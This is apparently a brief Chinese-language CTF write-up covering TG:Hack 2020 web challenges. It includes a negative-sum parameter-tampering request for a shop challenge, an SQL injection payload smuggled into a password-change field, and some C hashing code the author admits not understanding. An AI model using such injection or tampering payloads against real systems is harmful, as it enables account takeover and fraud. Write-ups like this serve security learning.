2020_TgHack

TgHack_2020_Web

Shop(easy)

题目就给了我们100刀,并且可以借$200,我们购买Flag要$1337,发现购买不存在的商品且提交为负数他会退款
exp:

1
2
/store
id=9999&sum=-2000

Redux

js里面找到flag

Exfiltration

Xss我打了半天没打到,戴师傅一次成功,玄学

Bobby

exp:

1
new_pass:  ',pass=123456, user="bobby" WHere 1 or pass=? or pass=? --+

zero

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#include <nettle/sha2.h>
#include <nettle/sha3.h>
#include <string.h>

#define BUF_SIZE 128

void compute_sha3_256(char *digest, char *str) {
struct sha3_256_ctx ctx = {0};
sha3_256_init(&ctx);
sha3_256_update(&ctx, strnlen(str, BUF_SIZE), str);
sha3_256_digest(&ctx, SHA3_256_DIGEST_SIZE, digest);
}

void compute_sha256(char *digest, char *str) {
struct sha256_ctx ctx = {0};
sha256_init(&ctx);
sha256_update(&ctx, strnlen(str, BUF_SIZE), str);
sha256_digest(&ctx, SHA256_DIGEST_SIZE, digest);
}

void compute_hash(char *digest, char *password) {
char sha256_dgst[BUF_SIZE + 1] = {0};
compute_sha256(sha256_dgst, password);
compute_sha3_256(digest, sha256_dgst);
}

不懂 之后学习带师傅们

Files